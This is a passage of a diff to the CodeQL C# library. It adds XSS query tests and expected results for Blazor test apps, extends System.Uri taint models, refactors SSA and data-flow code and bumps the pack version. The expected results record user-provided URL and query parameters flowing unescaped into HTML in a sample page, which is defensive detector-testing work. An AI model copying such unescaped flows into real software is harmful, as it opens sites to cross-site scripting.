Microsoft.AspNetCore.Components; SupplyParameterFromQueryAttribute; false; ; ; Attribute.Getter; ReturnValue; remote; manual | +| 3 | Summary: Microsoft.AspNetCore.Components.CompilerServices; RuntimeHelpers; false; TypeCheck; (T); ; Argument[0]; ReturnValue; value; manual | +nodes +| BlazorTest/Components/MyOutput.razor:5:53:5:57 | access to property Value | semmle.label | access to property Value | +| BlazorTest/Components/Pages/TestPage.razor:11:48:11:55 | access to property UrlParam | semmle.label | access to property UrlParam | +| BlazorTest/Components/Pages/TestPage.razor:20:60:20:69 | access to property QueryParam | semmle.label | access to property QueryParam | +| BlazorTest/Components/Pages/TestPage.razor:85:23:85:32 | access to property QueryParam : String | semmle.label | access to property QueryParam : String | +| test-db/working/razor/AC613014E59A413B9538FF8068364499/Microsoft.CodeAnalysis.Razor.Compiler/Microsoft.NET.Sdk.Razor.SourceGenerators.RazorSourceGenerator/Components_Pages_TestPage_razor.g.cs:569:16:577:13 | call to method TypeCheck : String | semmle.label | call to method TypeCheck : String | +subpaths diff --git a/csharp/ql/integration-tests/all-platforms/blazor_build_mode_none/XSS.qlref b/csharp/ql/integration-tests/all-platforms/blazor_build_mode_none/XSS.qlref new file mode 100644 index 000000000000..89b5b951bdb6 --- /dev/null +++ b/csharp/ql/integration-tests/all-platforms/blazor_build_mode_none/XSS.qlref @@ -0,0 +1,2 @@ +query: Security Features/CWE-079/XSS.ql +postprocess: utils/test/PrettyPrintModels.ql diff --git a/csharp/ql/integration-tests/all-platforms/blazor_net_8/BlazorTest/Components/Pages/TestPage.razor b/csharp/ql/integration-tests/all-platforms/blazor_net_8/BlazorTest/Components/Pages/TestPage.razor index 39238d724298..ac3ccbe19207 100644 --- a/csharp/ql/integration-tests/all-platforms/blazor_net_8/BlazorTest/Components/Pages/TestPage.razor +++ b/csharp/ql/integration-tests/all-platforms/blazor_net_8/BlazorTest/Components/Pages/TestPage.razor @@ -81,6 +81,10 @@ +
+ +
+ @code { public class Container diff --git a/csharp/ql/integration-tests/all-platforms/blazor_net_8/XSS.expected b/csharp/ql/integration-tests/all-platforms/blazor_net_8/XSS.expected new file mode 100644 index 000000000000..204c31945956 --- /dev/null +++ b/csharp/ql/integration-tests/all-platforms/blazor_net_8/XSS.expected @@ -0,0 +1,8 @@ +#select +| BlazorTest/Components/Pages/TestPage.razor:11:48:11:55 | access to property UrlParam | BlazorTest/Components/Pages/TestPage.razor:11:48:11:55 | access to property UrlParam | BlazorTest/Components/Pages/TestPage.razor:11:48:11:55 | access to property UrlParam | $@ flows to here and is written to HTML or JavaScript. | BlazorTest/Components/Pages/TestPage.razor:11:48:11:55 | access to property UrlParam | User-provided value | +| BlazorTest/Components/Pages/TestPage.razor:20:60:20:69 | access to property QueryParam | BlazorTest/Components/Pages/TestPage.razor:20:60:20:69 | access to property QueryParam | BlazorTest/Components/Pages/TestPage.razor:20:60:20:69 | access to property QueryParam | $@ flows to here and is written to HTML or JavaScript. | BlazorTest/Components/Pages/TestPage.razor:20:60:20:69 | access to property QueryParam | User-provided value | +edges +nodes +| BlazorTest/Components/Pages/TestPage.razor:11:48:11:55 | access to property UrlParam | semmle.label | access to property UrlParam | +| BlazorTest/Components/Pages/TestPage.razor:20:60:20:69 | access to property QueryParam | semmle.label | access to property QueryParam | +subpaths diff --git a/csharp/ql/integration-tests/all-platforms/blazor_net_8/XSS.qlref b/csharp/ql/integration-tests/all-platforms/blazor_net_8/XSS.qlref new file mode 100644 index 000000000000..89b5b951bdb6 --- /dev/null +++ b/csharp/ql/integration-tests/all-platforms/blazor_net_8/XSS.qlref @@ -0,0 +1,2 @@ +query: Security Features/CWE-079/XSS.ql +postprocess: utils/test/PrettyPrintModels.ql diff --git a/csharp/ql/integration-tests/all-platforms/standalone_resx/CompilationInfo.expected b/csharp/ql/integration-tests/all-platforms/standalone_resx/CompilationInfo.expected index 48cca2534533..ee27a1cd9120 100644 --- a/csharp/ql/integration-tests/all-platforms/standalone_resx/CompilationInfo.expected +++ b/csharp/ql/integration-tests/all-platforms/standalone_resx/CompilationInfo.expected @@ -1,6 +1,7 @@ | All Nuget feeds reachable | 1.0 | | Failed project restore with package source error | 0.0 | | Failed solution restore with package source error | 0.0 | +| Inherited Nuget feed count | 1.0 | | NuGet feed responsiveness checked | 1.0 | | Project files on filesystem | 1.0 | | Reachable fallback Nuget feed count | 1.0 | diff --git a/csharp/ql/integration-tests/all-platforms/standalone_winforms/CompilationInfo.expected b/csharp/ql/integration-tests/all-platforms/standalone_winforms/CompilationInfo.expected index f87af9b7599d..cf2e7f2db702 100644 --- a/csharp/ql/integration-tests/all-platforms/standalone_winforms/CompilationInfo.expected +++ b/csharp/ql/integration-tests/all-platforms/standalone_winforms/CompilationInfo.expected @@ -1,6 +1,7 @@ | All Nuget feeds reachable | 1.0 | | Failed project restore with package source error | 0.0 | | Failed solution restore with package source error | 0.0 | +| Inherited Nuget feed count | 1.0 | | NuGet feed responsiveness checked | 1.0 | | Project files on filesystem | 1.0 | | Reachable fallback Nuget feed count | 1.0 | diff --git a/csharp/ql/lib/CHANGELOG.md b/csharp/ql/lib/CHANGELOG.md index 2ca6fea2b086..9b5f38e0ca51 100644 --- a/csharp/ql/lib/CHANGELOG.md +++ b/csharp/ql/lib/CHANGELOG.md @@ -1,3 +1,10 @@ +## 5.1.3 + +### Minor Analysis Improvements + +* The models for `System.Uri` have been modified to better model the flow of tainted URIs. +* Modeled parameter passing between Blazor parent and child components. + ## 5.1.2 No user-facing changes. diff --git a/csharp/ql/lib/change-notes/released/5.1.3.md b/csharp/ql/lib/change-notes/released/5.1.3.md new file mode 100644 index 000000000000..978a05a50fae --- /dev/null +++ b/csharp/ql/lib/change-notes/released/5.1.3.md @@ -0,0 +1,6 @@ +## 5.1.3 + +### Minor Analysis Improvements + +* The models for `System.Uri` have been modified to better model the flow of tainted URIs. +* Modeled parameter passing between Blazor parent and child components. diff --git a/csharp/ql/lib/codeql-pack.release.yml b/csharp/ql/lib/codeql-pack.release.yml index d21c12fbe7fb..8ffbc76d58a0 100644 --- a/csharp/ql/lib/codeql-pack.release.yml +++ b/csharp/ql/lib/codeql-pack.release.yml @@ -1,2 +1,2 @@ --- -lastReleaseVersion: 5.1.2 +lastReleaseVersion: 5.1.3 diff --git a/csharp/ql/lib/ext/System.model.yml b/csharp/ql/lib/ext/System.model.yml index 5e94dfcbf083..3853f03dc2fc 100644 --- a/csharp/ql/lib/ext/System.model.yml +++ b/csharp/ql/lib/ext/System.model.yml @@ -778,9 +778,23 @@ extensions: - ["System", "TupleExtensions", False, "Deconstruct", "(System.Tuple,T1,T2)", "", "Argument[0].Property[System.Tuple`2.Item2]", "Argument[2]", "value", "manual"] - ["System", "TupleExtensions", False, "Deconstruct", "(System.Tuple,T1)", "", "Argument[0].Property[System.Tuple`1.Item1]", "Argument[1]", "value", "manual"] - ["System", "Uri", False, "ToString", "()", "", "Argument[this]", "ReturnValue", "taint", "manual"] + - ["System", "Uri", False, "TryCreate", "(System.String,System.UriCreationOptions,System.Uri)", "", "Argument[0]", "Argument[2]", "taint", "manual"] + - ["System", "Uri", False, "TryCreate", "(System.String,System.UriKind,System.Uri)", "", "Argument[0]", "Argument[2]", "taint", "manual"] + - ["System", "Uri", False, "TryCreate", "(System.Uri,System.String,System.Uri)", "", "Argument[0]", "Argument[2]", "taint", "manual"] + - ["System", "Uri", False, "TryCreate", "(System.Uri,System.String,System.Uri)", "", "Argument[1]", "Argument[2]", "taint", "manual"] + - ["System", "Uri", False, "TryCreate", "(System.Uri,System.Uri,System.Uri)", "", "Argument[0]", "Argument[2]", "taint", "manual"] + - ["System", "Uri", False, "TryCreate", "(System.Uri,System.Uri,System.Uri)", "", "Argument[1]", "Argument[2]", "taint", "manual"] - ["System", "Uri", False, "Uri", "(System.String)", "", "Argument[0]", "Argument[this]", "taint", "manual"] - ["System", "Uri", False, "Uri", "(System.String,System.Boolean)", "", "Argument[0]", "Argument[this]", "taint", "manual"] - ["System", "Uri", False, "Uri", "(System.String,System.UriKind)", "", "Argument[0]", "Argument[this]", "taint", "manual"] + - ["System", "Uri", False, "Uri", "(System.String,System.UriCreationOptions)", "", "Argument[0]", "Argument[this]", "taint", "manual"] + - ["System", "Uri", False, "Uri", "(System.Uri,System.String)", "", "Argument[0]", "Argument[this]", "taint", "manual"] + - ["System", "Uri", False, "Uri", "(System.Uri,System.String)", "", "Argument[1]", "Argument[this]", "taint", "manual"] + - ["System", "Uri", False, "Uri", "(System.Uri,System.String,System.Boolean)", "", "Argument[0]", "Argument[this]", "taint", "manual"] + - ["System", "Uri", False, "Uri", "(System.Uri,System.String,System.Boolean)", "", "Argument[1]", "Argument[this]", "taint", "manual"] + - ["System", "Uri", False, "get_AbsoluteUri", "()", "", "Argument[this]", "ReturnValue", "taint", "manual"] + - ["System", "Uri", False, "get_DnsSafeHost", "()", "", "Argument[this]", "ReturnValue", "taint", "manual"] + - ["System", "Uri", False, "get_LocalPath", "()", "", "Argument[this]", "ReturnValue", "taint", "manual"] - ["System", "Uri", False, "get_OriginalString", "()", "", "Argument[this]", "ReturnValue", "taint", "manual"] - ["System", "Uri", False, "get_PathAndQuery", "()", "", "Argument[this]", "ReturnValue", "taint", "manual"] - ["System", "Uri", False, "get_Query", "()", "", "Argument[this]", "ReturnValue", "taint", "manual"] diff --git a/csharp/ql/lib/qlpack.yml b/csharp/ql/lib/qlpack.yml index addd301f65f4..6e3be2c91cb8 100644 --- a/csharp/ql/lib/qlpack.yml +++ b/csharp/ql/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/csharp-all -version: 5.1.2 +version: 5.1.3 groups: csharp dbscheme: semmlecode.csharp.dbscheme extractor: csharp diff --git a/csharp/ql/lib/semmle/code/csharp/Type.qll b/csharp/ql/lib/semmle/code/csharp/Type.qll index 6901fb806b19..9283bb3002a1 100644 --- a/csharp/ql/lib/semmle/code/csharp/Type.qll +++ b/csharp/ql/lib/semmle/code/csharp/Type.qll @@ -1214,6 +1214,8 @@ class ArglistType extends Type, @arglist_type { class UnknownType extends Type, @unknown_type { /** Holds if this is the canonical unknown type, and not a type that failed to extract properly. */ predicate isCanonical() { types(this, _, "") } + + override string getAPrimaryQlClass() { result = "UnknownType" } } /** diff --git a/csharp/ql/lib/semmle/code/csharp/controlflow/internal/Completion.qll b/csharp/ql/lib/semmle/code/csharp/controlflow/internal/Completion.qll index a470d0c4b8a2..6fed45cdf84d 100644 --- a/csharp/ql/lib/semmle/code/csharp/controlflow/internal/Completion.qll +++ b/csharp/ql/lib/semmle/code/csharp/controlflow/internal/Completion.qll @@ -293,6 +293,8 @@ private predicate isMatchingConstant(PatternExpr pe, boolean value) { value = true or exists(Type t, Type strippedType | + not t instanceof UnknownType and + not strippedType instanceof UnknownType and typePatternMustHaveMatchingCompletion(pe, t, strippedType) and not typePatternCommonSubType(t, strippedType) and value = false diff --git a/csharp/ql/lib/semmle/code/csharp/dataflow/internal/DataFlowPrivate.qll b/csharp/ql/lib/semmle/code/csharp/dataflow/internal/DataFlowPrivate.qll index 949eb7c2b41e..9373c46466a0 100644 --- a/csharp/ql/lib/semmle/code/csharp/dataflow/internal/DataFlowPrivate.qll +++ b/csharp/ql/lib/semmle/code/csharp/dataflow/internal/DataFlowPrivate.qll @@ -456,9 +456,9 @@ module VariableCapture { Flow::clearsContent(asClosureNode(node), getCapturedVariableContent(c)) } - class CapturedSsaDefinitionExt extends SsaImpl::DefinitionExt { - CapturedSsaDefinitionExt() { - this.getSourceVariable().getAssignable() = any(CapturedVariable v).asLocalScopeVariable() + class CapturedSsaSourceVariable extends Ssa::SourceVariable { + CapturedSsaSourceVariable() { + this.getAssignable() = any(CapturedVariable v).asLocalScopeVariable() } } @@ -506,15 +506,15 @@ module SsaFlow { result.(Impl::ExprPostUpdateNode).getExpr() = n.(PostUpdateNode).getPreUpdateNode().(ExprNode).getControlFlowNode() or - result.(Impl::ParameterNode).getParameter() = n.(ExplicitParameterNode).getSsaDefinition() + result.(Impl::WriteDefSourceNode).getDefinition() = n.(ExplicitParameterNode).getSsaDefinition() } - predicate localFlowStep(SsaImpl::DefinitionExt def, Node nodeFrom, Node nodeTo, boolean isUseStep) { - Impl::localFlowStep(def, asNode(nodeFrom), asNode(nodeTo), isUseStep) + predicate localFlowStep(Ssa::SourceVariable v, Node nodeFrom, Node nodeTo, boolean isUseStep) { + Impl::localFlowStep(v, asNode(nodeFrom), asNode(nodeTo), isUseStep) } - predicate localMustFlowStep(SsaImpl::DefinitionExt def, Node nodeFrom, Node nodeTo) { - Impl::localMustFlowStep(def, asNode(nodeFrom), asNode(nodeTo)) + predicate localMustFlowStep(Ssa::SourceVariable v, Node nodeFrom, Node nodeTo) { + Impl::localMustFlowStep(v, asNode(nodeFrom), asNode(nodeTo)) } } @@ -644,12 +644,10 @@ module LocalFlow { } /** - * Holds if the source variable of SSA definition `def` is an instance field. + * Holds if the source variable `v` is an instance field. */ - predicate usesInstanceField(SsaImpl::DefinitionExt def) { - exists(Ssa::SourceVariables::FieldOrPropSourceVariable fp | fp = def.getSourceVariable() | - not fp.getAssignable().(Modifiable).isStatic() - ) + predicate isInstanceField(Ssa::SourceVariables::FieldOrPropSourceVariable v) { + not v.getAssignable().(Modifiable).isStatic() } predicate localFlowStepCommon(Node nodeFrom, Node nodeTo) { @@ -693,19 +691,22 @@ module LocalFlow { ) } - /** Gets a node for which to construct a post-update node for argument `arg`. */ - ControlFlow::Nodes::ExprNode getAPostUpdateNodeForArg(ControlFlow::Nodes::ExprNode arg) { - arg.getExpr() instanceof Argument and - result = getALastEvalNode*(arg) and - exists(Expr e, Type t | result.getExpr() = e and t = e.stripCasts().getType() | - t instanceof RefType and - not t instanceof NullType - or - t = any(TypeParameter tp | not tp.isValueType()) - or - t.isRefLikeType() - ) and - not exists(getALastEvalNode(result)) + /** + * Holds if a reverse local flow step should be added from the post-update node + * for `e` to the post-update node for the result. + * + * This is needed to allow for side-effects on compound expressions to propagate + * to sub components. For example, in + * + * ```csharp + * m(b ? x : y) + * ``` + * + * we add a reverse flow step from `[post] b ? x : y` to `[post] x` and to + * `[post] y`, in order for the side-effect of `m` to reach both `x` and `y`. + */ + ControlFlow::Nodes::ExprNode getPostUpdateReverseStep(ControlFlow::Nodes::ExprNode e) { + result = getALastEvalNode(e) } /** @@ -749,10 +750,10 @@ predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo, string model) { ( LocalFlow::localFlowStepCommon(nodeFrom, nodeTo) or - exists(SsaImpl::DefinitionExt def, boolean isUseStep | - SsaFlow::localFlowStep(def, nodeFrom, nodeTo, isUseStep) and - not LocalFlow::usesInstanceField(def) and - not def instanceof VariableCapture::CapturedSsaDefinitionExt + exists(Ssa::SourceVariable v, boolean isUseStep | + SsaFlow::localFlowStep(v, nodeFrom, nodeTo, isUseStep) and + not LocalFlow::isInstanceField(v) and + not v instanceof VariableCapture::CapturedSsaSourceVariable | isUseStep = false or @@ -765,6 +766,13 @@ predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo, string model) { VariableCapture::valueStep(nodeFrom, nodeTo) or nodeTo = nodeFrom.(LocalFunctionCreationNode).getAnAccess(true) + or + nodeTo.(PostUpdateNode).getPreUpdateNode().(ExprNode).getControlFlowNode() = + LocalFlow::getPostUpdateReverseStep(nodeFrom + .(PostUpdateNode) + .getPreUpdateNode() + .(ExprNode) + .getControlFlowNode()) ) and model = "" or @@ -1063,6 +1071,20 @@ private class FieldOrPropertyUsedInSource extends FieldOrProperty { } } +/** + * Hold if `e` has a type that allows for it to have a post-update node. + */ +predicate exprMayHavePostUpdateNode(Expr e) { + exists(Type t | t = e.stripCasts().getType() | + t instanceof RefType and + not t instanceof NullType + or + t = any(TypeParameter tp | not tp.isValueType()) + or + t.isRefLikeType() + ) +} + /** A collection of cached types and predicates to be evaluated in the same stage. */ cached private module Cached { @@ -1108,7 +1130,15 @@ private module Cached { cfn.getAstNode().(ObjectCreation).hasInitializer() } or TExprPostUpdateNode(ControlFlow::Nodes::ExprNode cfn) { - cfn = LocalFlow::getAPostUpdateNodeForArg(_) + ( + cfn.getExpr() instanceof Argument + or + cfn = + LocalFlow::getPostUpdateReverseStep(any(ControlFlow::Nodes::ExprNode e | + exists(any(SourcePostUpdateNode p).getPreUpdateNode().asExprAtNode(e)) + )) + ) and + exprMayHavePostUpdateNode(cfn.getExpr()) or exists(Expr e | e = cfn.getExpr() | fieldOrPropertyStore(_, _, _, e, true) @@ -2733,17 +2763,23 @@ abstract class PostUpdateNode extends Node { } module PostUpdateNodes { - class ObjectCreationNode extends PostUpdateNode, ExprNode, TExprNode { + abstract class SourcePostUpdateNode extends PostUpdateNode { + abstract Node getPreUpdateSourceNode(); + + final override Node getPreUpdateNode() { result = this.getPreUpdateSourceNode() } + } + + class ObjectCreationNode extends SourcePostUpdateNode, ExprNode, TExprNode { private ObjectCreation oc; ObjectCreationNode() { this = TExprNode(oc.getAControlFlowNode()) } - override Node getPreUpdateNode() { + override Node getPreUpdateSourceNode() { exists(ControlFlow::Nodes::ElementNode cfn | this = TExprNode(cfn) | - result.(ObjectInitializerNode).getControlFlowNode() = cfn + result = TObjectInitializerNode(cfn) or not oc.hasInitializer() and - result.(MallocNode).getControlFlowNode() = cfn + result = TMallocNode(cfn) ) } } @@ -2755,7 +2791,7 @@ module PostUpdateNodes { * Such a node acts as both a post-update node for the `MallocNode`, as well as * a pre-update node for the `ObjectCreationNode`. */ - class ObjectInitializerNode extends PostUpdateNode, NodeImpl, ArgumentNodeImpl, + class ObjectInitializerNode extends SourcePostUpdateNode, NodeImpl, ArgumentNodeImpl, TObjectInitializerNode { private ObjectCreation oc; @@ -2769,7 +2805,7 @@ module PostUpdateNodes { /** Gets the initializer to which this initializer node belongs. */ ObjectOrCollectionInitializer getInitializer() { result = oc.getInitializer() } - override MallocNode getPreUpdateNode() { result.getControlFlowNode() = cfn } + override MallocNode getPreUpdateSourceNode() { result = TMallocNode(cfn) } override predicate argumentOf(DataFlowCall call, ArgumentPosition pos) { pos.isQualifier() and @@ -2792,23 +2828,12 @@ module PostUpdateNodes { override string toStringImpl() { result = "[pre-initializer] " + cfn } } - class ExprPostUpdateNode extends PostUpdateNode, NodeImpl, TExprPostUpdateNode { + class ExprPostUpdateNode extends SourcePostUpdateNode, NodeImpl, TExprPostUpdateNode { private ControlFlow::Nodes::ElementNode cfn; ExprPostUpdateNode() { this = TExprPostUpdateNode(cfn) } - override ExprNode getPreUpdateNode() { - // For compound arguments, such as `m(b ? x : y)`, we want the leaf nodes - // `[post] x` and `[post] y` to have two pre-update nodes: (1) the compound argument, - // `if b then x else y`; and the (2) the underlying expressions; `x` and `y`, - // respectively. - // - // This ensures that we get flow out of the call into both leafs (1), while still - // maintaining the invariant that the underlying expression is a pre-update node (2). - cfn = LocalFlow::getAPostUpdateNodeForArg(result.getControlFlowNode()) - or - cfn = result.getControlFlowNode() - } + override ExprNode getPreUpdateSourceNode() { result = TExprNode(cfn) } override DataFlowCallable getEnclosingCallableImpl() { result.getAControlFlowNode() = cfn @@ -2836,41 +2861,41 @@ module PostUpdateNodes { override Node getPreUpdateNode() { result.(FlowSummaryNode).getSummaryNode() = preUpdateNode } } - private class InstanceParameterAccessPostUpdateNode extends PostUpdateNode, + private class InstanceParameterAccessPostUpdateNode extends SourcePostUpdateNode, InstanceParameterAccessNode { InstanceParameterAccessPostUpdateNode() { isPostUpdate = true } - override InstanceParameterAccessPreNode getPreUpdateNode() { + override InstanceParameterAccessPreNode getPreUpdateSourceNode() { result = TInstanceParameterAccessNode(cfn, false) } override string toStringImpl() { result = "[post] this" } } - private class PrimaryConstructorThisAccessPostUpdateNode extends PostUpdateNode, + private class PrimaryConstructorThisAccessPostUpdateNode extends SourcePostUpdateNode, PrimaryConstructorThisAccessNode { PrimaryConstructorThisAccessPostUpdateNode() { isPostUpdate = true } - override PrimaryConstructorThisAccessPreNode getPreUpdateNode() { + override PrimaryConstructorThisAccessPreNode getPreUpdateSourceNode() { result = TPrimaryConstructorThisAccessNode(p, false, callable) } override string toStringImpl() { result = "[post] this" } } - class LocalFunctionCreationPostUpdateNode extends LocalFunctionCreationNode, PostUpdateNode { + class LocalFunctionCreationPostUpdateNode extends LocalFunctionCreationNode, SourcePostUpdateNode { LocalFunctionCreationPostUpdateNode() { isPostUpdate = true } - override LocalFunctionCreationPreNode getPreUpdateNode() { + override LocalFunctionCreationPreNode getPreUpdateSourceNode() { result = TLocalFunctionCreationNode(cfn, false) } override string toStringImpl() { result = "[post] " + cfn } } - private class CapturePostUpdateNode extends PostUpdateNode, CaptureNode { + private class CapturePostUpdateNode extends SourcePostUpdateNode, CaptureNode { private CaptureNode pre; CapturePostUpdateNode() { @@ -2878,7 +2903,7 @@ module PostUpdateNodes { pre.getSynthesizedCaptureNode()) } - override CaptureNode getPreUpdateNode() { result = pre } + override CaptureNode getPreUpdateSourceNode() { result = pre } override string toStringImpl() { result = "[post] " + cn } } @@ -3016,13 +3041,13 @@ private predicate delegateCreationStep(Node nodeFrom, Node nodeTo) { /** Extra data-flow steps needed for lambda flow analysis. */ predicate additionalLambdaFlowStep(Node nodeFrom, Node nodeTo, boolean preservesValue) { - exists(SsaImpl::DefinitionExt def | - SsaFlow::localFlowStep(def, nodeFrom, nodeTo, _) and + exists(Ssa::SourceVariable v | + SsaFlow::localFlowStep(v, nodeFrom, nodeTo, _) and preservesValue = true | - LocalFlow::usesInstanceField(def) + LocalFlow::isInstanceField(v) or - def instanceof VariableCapture::CapturedSsaDefinitionExt + v instanceof VariableCapture::CapturedSsaSourceVariable ) or delegateCreationStep(nodeFrom, nodeTo) and diff --git a/csharp/ql/lib/semmle/code/csharp/dataflow/internal/DataFlowPublic.qll b/csharp/ql/lib/semmle/code/csharp/dataflow/internal/DataFlowPublic.qll index 877630359fda..b21d5e2c3efb 100644 --- a/csharp/ql/lib/semmle/code/csharp/dataflow/internal/DataFlowPublic.qll +++ b/csharp/ql/lib/semmle/code/csharp/dataflow/internal/DataFlowPublic.qll @@ -147,6 +147,16 @@ predicate localFlow(Node source, Node sink) { localFlowStep*(source, sink) } pragma[inline] predicate localExprFlow(Expr e1, Expr e2) { localFlow(exprNode(e1), exprNode(e2)) } +/** + * A module importing the modules that provide non local jump node declarations, + * ensuring that they are visible to the taint tracking / data flow library. + */ +private module JumpNodes { + private import semmle.code.csharp.frameworks.microsoft.aspnetcore.Components + private import semmle.code.csharp.frameworks.Razor + private import semmle.code.csharp.frameworks.NHibernate +} + /** * A data flow node that jumps between callables. This can be extended in * framework code to add additional data flow steps. diff --git a/csharp/ql/lib/semmle/code/csharp/dataflow/internal/SsaImpl.qll b/csharp/ql/lib/semmle/code/csharp/dataflow/internal/SsaImpl.qll index 61787debca4f..ad7a2aba911a 100644 --- a/csharp/ql/lib/semmle/code/csharp/dataflow/internal/SsaImpl.qll +++ b/csharp/ql/lib/semmle/code/csharp/dataflow/internal/SsaImpl.qll @@ -60,12 +60,6 @@ class PhiNode = Impl::PhiNode; module Consistency = Impl::Consistency; -module ExposedForTestingOnly { - predicate ssaDefReachesReadExt = Impl::ssaDefReachesReadExt/4; - - predicate phiHasInputFromBlockExt = Impl::phiHasInputFromBlockExt/3; -} - /** * Holds if the `i`th node of basic block `bb` reads source variable `v`. */ @@ -967,13 +961,13 @@ private module Cached { import DataFlowIntegrationImpl cached - predicate localFlowStep(DefinitionExt def, Node nodeFrom, Node nodeTo, boolean isUseStep) { - DataFlowIntegrationImpl::localFlowStep(def, nodeFrom, nodeTo, isUseStep) + predicate localFlowStep(Ssa::SourceVariable v, Node nodeFrom, Node nodeTo, boolean isUseStep) { + DataFlowIntegrationImpl::localFlowStep(v, nodeFrom, nodeTo, isUseStep) } cached - predicate localMustFlowStep(DefinitionExt def, Node nodeFrom, Node nodeTo) { - DataFlowIntegrationImpl::localMustFlowStep(def, nodeFrom, nodeTo) + predicate localMustFlowStep(Ssa::SourceVariable v, Node nodeFrom, Node nodeTo) { + DataFlowIntegrationImpl::localMustFlowStep(v, nodeFrom, nodeTo) } signature predicate guardChecksSig(Guards::Guard g, Expr e, Guards::AbstractValue v); @@ -1000,9 +994,9 @@ private module Cached { import Cached -private string getSplitString(DefinitionExt def) { +private string getSplitString(Definition def) { exists(ControlFlow::BasicBlock bb, int i, ControlFlow::Node cfn | - def.definesAt(_, bb, i, _) and + def.definesAt(_, bb, i) and result = cfn.(ControlFlow::Nodes::ElementNode).getSplitsString() | cfn = bb.getNode(i) @@ -1012,48 +1006,13 @@ private string getSplitString(DefinitionExt def) { ) } -string getToStringPrefix(DefinitionExt def) { +string getToStringPrefix(Definition def) { result = "[" + getSplitString(def) + "] " or not exists(getSplitString(def)) and result = "" } -/** - * An extended static single assignment (SSA) definition. - * - * This is either a normal SSA definition (`Definition`) or a - * phi-read node (`PhiReadNode`). - * - * Only intended for internal use. - */ -class DefinitionExt extends Impl::DefinitionExt { - override string toString() { result = this.(Ssa::Definition).toString() } - - /** Gets the location of this definition. */ - override Location getLocation() { result = this.(Ssa::Definition).getLocation() } - - /** Gets the enclosing callable of this definition. */ - Callable getEnclosingCallable() { result = this.(Ssa::Definition).getEnclosingCallable() } -} - -/** - * A phi-read node. - * - * Only intended for internal use. - */ -class PhiReadNode extends DefinitionExt, Impl::PhiReadNode { - override string toString() { - result = getToStringPrefix(this) + "SSA phi read(" + this.getSourceVariable() + ")" - } - - override Location getLocation() { result = this.getBasicBlock().getLocation() } - - override Callable getEnclosingCallable() { - result = this.getSourceVariable().getEnclosingCallable() - } -} - private module DataFlowIntegrationInput implements Impl::DataFlowIntegrationInputSig { private import csharp as Cs private import semmle.code.csharp.controlflow.BasicBlocks @@ -1064,16 +1023,12 @@ private module DataFlowIntegrationInput implements Impl::DataFlowIntegrationInpu Expr getARead(Definition def) { exists(getAReadAtNode(def, result)) } - predicate ssaDefAssigns(WriteDefinition def, Expr value) { + predicate ssaDefHasSource(WriteDefinition def) { // exclude flow directly from RHS to SSA definition, as we instead want to - // go from RHS to matching assingnable definition, and from there to SSA definition - none() + // go from RHS to matching assignable definition, and from there to SSA definition + def instanceof Ssa::ImplicitParameterDefinition } - class Parameter = Ssa::ImplicitParameterDefinition; - - predicate ssaDefInitializesParam(WriteDefinition def, Parameter p) { def = p } - /** * Allows for flow into uncertain defintions that are not call definitions, * as we, conservatively, consider such definitions to be certain. @@ -1088,29 +1043,28 @@ private module DataFlowIntegrationInput implements Impl::DataFlowIntegrationInpu } class Guard extends Guards::Guard { - predicate hasCfgNode(ControlFlow::BasicBlock bb, int i) { - this.getAControlFlowNode() = bb.getNode(i) + /** + * Holds if the control flow branching from `bb1` is dependent on this guard, + * and that the edge from `bb1` to `bb2` corresponds to the evaluation of this + * guard to `branch`. + */ + predicate controlsBranchEdge(BasicBlock bb1, BasicBlock bb2, boolean branch) { + exists(ControlFlow::SuccessorTypes::ConditionalSuccessor s | + this.getAControlFlowNode() = bb1.getLastNode() and + bb2 = bb1.getASuccessorByType(s) and + s.getValue() = branch + ) } } /** Holds if the guard `guard` controls block `bb` upon evaluating to `branch`. */ - predicate guardControlsBlock(Guard guard, ControlFlow::BasicBlock bb, boolean branch) { + predicate guardDirectlyControlsBlock(Guard guard, ControlFlow::BasicBlock bb, boolean branch) { exists(ConditionBlock conditionBlock, ControlFlow::SuccessorTypes::ConditionalSuccessor s | guard.getAControlFlowNode() = conditionBlock.getLastNode() and s.getValue() = branch and conditionBlock.edgeDominates(bb, s) ) } - - /** Gets an immediate conditional successor of basic block `bb`, if any. */ - ControlFlow::BasicBlock getAConditionalBasicBlockSuccessor( - ControlFlow::BasicBlock bb, boolean branch - ) { - exists(ControlFlow::SuccessorTypes::ConditionalSuccessor s | - result = bb.getASuccessorByType(s) and - s.getValue() = branch - ) - } } private module DataFlowIntegrationImpl = Impl::DataFlowIntegration; diff --git a/csharp/ql/lib/semmle/code/csharp/frameworks/microsoft/aspnetcore/Components.qll b/csharp/ql/lib/semmle/code/csharp/frameworks/microsoft/aspnetcore/Components.qll index 6e37fc0480fb..be937661b477 100644 --- a/csharp/ql/lib/semmle/code/csharp/frameworks/microsoft/aspnetcore/Components.qll +++ b/csharp/ql/lib/semmle/code/csharp/frameworks/microsoft/aspnetcore/Components.qll @@ -112,6 +112,16 @@ class MicrosoftAspNetCoreComponentsComponent extends Class { } } +/** + * The `Microsoft.AspNetCore.Components.Rendering.RenderTreeBuilder::AddComponentParameter` method. + */ +private class MicrosoftAspNetCoreComponentsAddComponentParameterMethod extends Method { + MicrosoftAspNetCoreComponentsAddComponentParameterMethod() { + this.hasFullyQualifiedName("Microsoft.AspNetCore.Components.Rendering", "RenderTreeBuilder", + "AddComponentParameter") + } +} + private module Sources { private import semmle.code.csharp.security.dataflow.flowsources.Remote @@ -133,3 +143,44 @@ private module Sources { override string getSourceType() { result = "ASP.NET Core component route parameter" } } } + +private module JumpNodes { + /** + * A call to `Microsoft.AspNetCore.Components.Rendering.RenderTreeBuilder::AddComponentParameter` which + * sets the value of a parameter. + */ + private class ParameterPassingCall extends Call { + ParameterPassingCall() { + this.getTarget() instanceof MicrosoftAspNetCoreComponentsAddComponentParameterMethod + } + + /** + * Gets the property whose value is being set. + */ + Property getParameterProperty() { + result.getAnAttribute() instanceof MicrosoftAspNetCoreComponentsParameterAttribute and + exists(NameOfExpr ne | ne = this.getArgument(1) | result.getAnAccess() = ne.getAccess()) + } + + /** + * Gets the value being set. + */ + Expr getParameterValue() { result = this.getArgument(2) } + } + + private class ComponentParameterJump extends DataFlow::NonLocalJumpNode { + Property prop; + + ComponentParameterJump() { + exists(ParameterPassingCall call | + prop = call.getParameterProperty() and + this.asExpr() = call.getParameterValue() + ) + } + + override DataFlow::Node getAJumpSuccessor(boolean preservesValue) { + 